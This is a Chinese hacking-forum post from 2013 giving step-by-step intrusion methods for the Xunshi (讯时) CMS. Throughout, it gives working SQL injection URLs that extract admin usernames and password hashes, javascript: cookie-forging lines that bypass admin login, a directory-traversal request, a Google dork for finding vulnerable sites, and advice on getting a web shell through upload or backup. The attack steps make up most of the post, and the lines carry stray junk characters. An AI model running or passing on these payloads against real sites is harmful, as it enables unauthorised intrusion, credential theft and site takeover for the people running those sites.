找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2526|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘6 B  Y& W2 d' r" V* i
1 m; R) a& ?9 j. c
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
! z* e. L; E4 y8 Z$ G
5 b0 z8 i  V2 r0 A. b: p以下本文总结来自黑防去年第9期杂志上的内容...
$ w: s$ A4 S$ _6 Z( z5 i* O4 e0 q' _! P: b* B
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
# O! ^9 M% _1 @+ K* M
% Z. u0 Z8 M' T. O/ w) o4 l26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 ( p: e% W3 f% ~$ Z8 B

. \8 s1 J( N3 }( b记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况+ k' y" I$ C0 f3 D- x' \
这里一个注入, o# Z# F( m7 G, W" o3 F1 T4 w
+ K: `* y, p0 m$ J9 P
效果如图:$ U; W# y' h" I0 c

" A  U! D& j3 e, q+ e " d1 B" |& {# F; X2 |
+ f( g( K) p% V& f- H, G
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.7 A- U; l% [3 h# b4 R0 C

9 x5 G- [+ V! _: l% j密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去7 A3 m: g: V0 ^
) z' U" K- a9 D( n( s! W& u6 T
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
7 W2 A& g# v: D/ r; J
$ h4 J, B$ q6 \' N. E那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:* i) g0 O* g% P* L# N7 W5 G
! M8 T5 }5 S/ b; l/ k8 ?" W
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
, U, _- w; O& N; N5 u5 n2 g
) I) }  A, Y# h" k它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
, Q% ^4 c5 P: v- b# ]# E+ o5 F' ?) b
" m+ G6 _- H& m* \9 W访问这页面来列目录..步骤如下:
- T7 p) g8 ]' h
: H0 m) {6 R  A# M# S7 @javascript:alert(document.cookie="admindj=1")
7 j- k( J1 M3 i! V" |( ?$ W4 {
# }7 G# }4 l! f6 M) k" `http://www.political-security.co ... asp?id=46&dir=../..- u( ]4 U4 e3 M

0 U3 G7 v6 J4 }$ v& n效果如图:
  r" s  h) [) _) R
0 `2 _8 }" A, x& R 9 X0 k% M7 }! S9 x3 ^' ~
0 u, g2 O6 f8 V' y2 W
这样全站目录都能瞧了..找到后台目录..进去..0 D5 {* c' I" y
% m4 f) t4 L2 z- W) }
那么进了后台怎么拿shell??上传--备份就ok了..
  \+ ^2 X" X4 W% ?0 H$ F
3 W& q( _0 n, B! Y那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
5 F: A1 N3 M/ c+ l9 d+ M& ]
* {" U  b7 Y5 ?: i这个我也碰到过一次..你都可以通过列目录来实现..1 ~% H' k8 h, q3 v
- ]1 h) M8 d( |2 a, w5 C. _& L
javascript:alert(document.cookie="admindj=1") $ {8 V# Y  I$ N; ~1 e7 a
* ^" M5 Z: P: D
http://www.political-security.co ... p?action=BackupData & Q8 T; v+ X8 A+ n9 t2 s
6 A4 ?7 l; k1 w! Q
备份ok..
6 U8 m& F% e0 k4 R# {) D
! z. D- j' a0 ?9 Y) y那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
" e4 [! `% |' v- @) d5 ]7 s
/ o, |: D0 T3 W0 x" H  n, j% _在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下  a4 l. P4 |+ u. s7 q

" F& X/ A/ _6 E; U+ g1 g然后访问此页面进行注入..步骤如下:  v# u8 n4 }. `2 F- k& _1 J
2 _( }7 I0 q4 H  ~, b
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
) ?( t4 ~) L+ I0 j
# c2 }# W% s# E. T# F然后请求admin/admin_chk.asp页面
6 M& {& n, k" w
' Y4 {- x: \3 X: D输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
$ x* l; V  N# o1 N4 P9 z
4 |, L* `, T! n) X: R26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin& b% V  k  Y; K% z

! g6 A2 ?$ L; ~% q效果如图所示:
# M& E9 P# X+ A# |) c1 S3 R: `- V9 E  L# i% G& h
4 x! W1 L8 d& t" U$ s/ P3 s6 Q

0 ^+ K2 r2 w, K# X2 ~讯时漏洞2$ v: t2 x! U: s9 W0 w" I' L
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
# J; g$ I  U# Z& W& F- a  p
# j+ |0 r7 U: G# c* |, s1、/admin/admin_news_pl_view.asp?id=1
6 ]' L. ]5 Q; x- ~//id任意 填入以下语句
7 o7 E- ^  I* H, T
# G; r- U- a, `) i5 \# U  P2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!0 O% s7 O4 r- f& S" B

* G" Q, G! [- k) r4 Q! |9 I- C! T; ]4 L1 i( T2 r5 P6 x0 ^: j4 N

9 p/ c( N% H2 y5 D) J  |/ |3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
; {5 @' n! q' j3 g- q( X ; U6 I: u1 H5 A( G3 J; O

" a. E6 n" C' s
  D2 {& N3 U4 b$ g爆出管理员帐号和密码了$ Z+ Z* A4 y9 o2 c* j

+ }. V7 G0 i' p0 a, y. |0 E* ^' O# Y; x+ p7 R/ A1 A

8 D) V- X1 {$ ^) Z4、cookies进后台
2 c9 Z+ L; a2 E: N9 _
# q9 y  _0 T; ]; Bjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));+ n" p( G/ U* K

0 V7 M- g  U, @; D$ H# Z% D( _* h! [1 E: A# g  h+ W( s
# H0 w/ J1 f  \# `1 x" U
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!; ~5 f  B8 j3 K! k( F

2 [" S- u2 ]( x
$ Y' ^" t+ L+ W' M6 N# B: v) m
6 g- l5 |/ e2 z) L% I6、后台有上传和备份取SHELL不难。( Q1 q1 S9 ^9 V1 M& r
; w, }3 v) {6 j. d# f3 N2 H. |
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
' ^' k2 r7 Y; T; p$ }+ ]6 C& F) R
/ G! D9 E) O$ T" R逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!) {6 L' k1 L3 g- V+ V4 Q

# |/ g6 |/ S% ], \$ V$ L0 s4 G  u; E
& ]6 \! j( ~. G' Q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表